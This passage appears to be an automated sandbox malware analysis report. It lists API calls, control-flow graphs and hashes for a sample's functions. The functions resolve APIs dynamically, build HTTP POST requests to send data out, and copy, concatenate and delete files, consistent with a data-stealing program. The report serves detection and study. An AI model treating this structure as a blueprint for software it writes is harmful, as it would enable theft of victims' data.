                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(044033A0,?,004136C0), ref: 0041613F
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(044031C0,?,004136C0), ref: 00416150
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75070000,04403148), ref: 00416172
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,04403160), ref: 00416193
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,04403250), ref: 004161AB
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,044031F0), ref: 004161CD
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E50000,043E7840), ref: 004161EE
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76E80000,04402B10), ref: 0041620F
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00416226
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • NtQueryInformationProcess, xrefs: 0041621A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                        • String ID: NtQueryInformationProcess
                                                                                                                                                                                                                                                                                        • API String ID: 2238633743-2781105232
                                                                                                                                                                                                                                                                                        • Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                                                                                        • Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00404DC0 Relevance: 54.8, APIs: 22, Strings: 9, Instructions: 569stringnetworkmemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 339 404dc0-404ee1 call 416da0 call 404470 call 4155a0 call 4170d0 lstrlen call 4170d0 call 4155a0 call 416d40 * 5 InternetOpenA StrCmpCA 362 404ee3 339->362 363 404eea-404eee 339->363 362->363 364 404ef4-405007 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416f20 call 416fb0 call 416ea0 call 416e00 * 3 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 363->364 365 405578-40560a InternetCloseHandle call 415070 * 2 call 417040 * 4 call 416da0 call 416e00 * 5 call 413220 call 416e00 363->365 364->365 428 40500d-40501b 364->428 429 405029 428->429 430 40501d-405027 428->430 431 405033-405065 HttpOpenRequestA 429->431 430->431 432 40556b-405572 InternetCloseHandle 431->432 433 40506b-4054e5 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap RtlAllocateHeap call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA call 415070 431->433 432->365 587 4054ea-405514 InternetReadFile 433->587 588 405516-40551d 587->588 589 40551f-405565 InternetCloseHandle 587->589 588->589 590 405521-40555f call 416fb0 call 416ea0 call 416e00 588->590 589->432 590->587
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
                                                                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,044035D0,?,04407F88,00000000,00000000,00400100,00000000), ref: 00405058
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,04403730,00000000,?,044076E0,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 004053FF
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00405417
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040542C
                                                                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 00405443
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
                                                                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0040546A
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040547C
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
                                                                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 004054A5
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
                                                                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405565
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405572
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040557C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                                                                                                                                                        • String ID: ------$"$"$"$--$------$------$------$J&f
                                                                                                                                                                                                                                                                                        • API String ID: 1133489818-3705675087
                                                                                                                                                                                                                                                                                        • Opcode ID: 9a72f97dd8b00e1372afdc8a2b1b03a2c1d95120a9669ee42c4e7e237aac3cad
                                                                                                                                                                                                                                                                                        • Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a72f97dd8b00e1372afdc8a2b1b03a2c1d95120a9669ee42c4e7e237aac3cad
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00405610 Relevance: 47.7, APIs: 19, Strings: 8, Instructions: 493networkstringmemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 598 405610-4056cb call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 613 4056d4-4056d8 598->613 614 4056cd 598->614 615 405c70-405c98 InternetCloseHandle call 4170d0 call 4094a0 613->615 616 4056de-405856 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 613->616 614->613 625 405cd7-405d3f call 415070 * 2 call 416da0 call 416e00 * 5 call 413220 call 416e00 615->625 626 405c9a-405cd2 call 416e20 call 416fb0 call 416ea0 call 416e00 615->626 616->615 700 40585c-40586a 616->700 626->625 701 405878 700->701 702 40586c-405876 700->702 703 405882-4058b5 HttpOpenRequestA 701->703 702->703 704 405c63-405c6a InternetCloseHandle 703->704 705 4058bb-405bdc call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA 703->705 704->615 814 405be2-405c0c InternetReadFile 705->814 815 405c17-405c5d InternetCloseHandle 814->815 816 405c0e-405c15 814->816 815->704 816->815 817 405c19-405c57 call 416fb0 call 416ea0 call 416e00 816->817 817->814
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,044035B0), ref: 004056C3
                                                                                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,044035E0,00000000,?,044076E0,00000000,?,0041E0D8), ref: 00405B1E
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00405B2F
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00405B47
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00405B5C
                                                                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 00405B73
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00405B85
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
                                                                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 00405BAB
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
                                                                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405C5D
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405C6A
                                                                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,044035D0,?,04407F88,00000000,00000000,00400100,00000000), ref: 004058A8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405C74
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                                                                                                                                                                                                        • String ID: "$"$------$------$------$-A$-A$J&f
                                                                                                                                                                                                                                                                                        • API String ID: 148854478-1022722094
                                                                                                                                                                                                                                                                                        • Opcode ID: 7227e4c7bb0658229b088806cf99446218fe04dc775902d63d9a1b08b8f75cce
                                                                                                                                                                                                                                                                                        • Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7227e4c7bb0658229b088806cf99446218fe04dc775902d63d9a1b08b8f75cce
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1271 40a030-40a04c call 417070 1274 40a05d-40a071 call 417070 1271->1274 1275 40a04e-40a05b call 416e20 1271->1275 1281 40a082-40a096 call 417070 1274->1281 1282 40a073-40a080 call 416e20 1274->1282 1280 40a0bd-40a128 call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 1275->1280 1314 40a12d-40a134 1280->1314 1281->1280 1290 40a098-40a0b8 call 416e00 * 3 call 413220 1281->1290 1282->1280 1308 40a6cf-40a6d2 1290->1308 1315 40a170-40a184 call 416d40 1314->1315 1316 40a136-40a152 call 4170d0 * 2 CopyFileA 1314->1316 1321 40a231-40a314 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 1315->1321 1322 40a18a-40a22c call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 1315->1322 1327 40a154-40a16e call 416da0 call 415bd0 1316->1327 1328 40a16c 1316->1328 1380 40a319-40a331 call 4170d0 1321->1380 1322->1380 1327->1314 1328->1315 1390 40a680-40a692 call 4170d0 DeleteFileA call 417040 1380->1390 1391 40a337-40a355 1380->1391 1401 40a697-40a6ca call 417040 call 416e00 * 5 call 413220 1390->1401 1399 40a666-40a676 1391->1399 1400 40a35b-40a36f GetProcessHeap RtlAllocateHeap 1391->1400 1410 40a67d 1399->1410 1402 40a372-40a382 1400->1402 1401->1308 1407 40a601-40a60e lstrlen 1402->1407 1408 40a388-40a42a call 416d40 * 6 call 417070 1402->1408 1411 40a610-40a642 lstrlen call 416da0 call 401500 call 404dc0 1407->1411 1412 40a655-40a663 memset 1407->1412 1450 40a42c-40a43b call 416e20 1408->1450 1451 40a43d-40a446 call 416e20 1408->1451 1410->1390 1428 40a647-40a650 call 416e00 1411->1428 1412->1399 1428->1412 1454 40a44b-40a45d call 417070 1450->1454 1451->1454 1458 40a470-40a479 call 416e20 1454->1458 1459 40a45f-40a46e call 416e20 1454->1459 1463 40a47e-40a48e call 4170b0 1458->1463 1459->1463 1466 40a490-40a498 call 416e20 1463->1466 1467 40a49d-40a5fc call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4097f0 call 4170d0 lstrcat call 416e00 lstrcat call 416e00 * 6 1463->1467 1466->1467 1467->1402
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04402B50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A510
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A532
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A554
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA94), ref: 0040A563
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040A605
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040A614
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040A65D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040A689
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2228671196-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9441de83010d804211ba2c91efd87ba17e13f51fe28cc11ac5193f2a5a82d0e2
                                                                                                                                                                                                                                                                                        • Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9441de83010d804211ba2c91efd87ba17e13f51fe28cc11ac5193f2a5a82d0e2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04407710,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C958
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
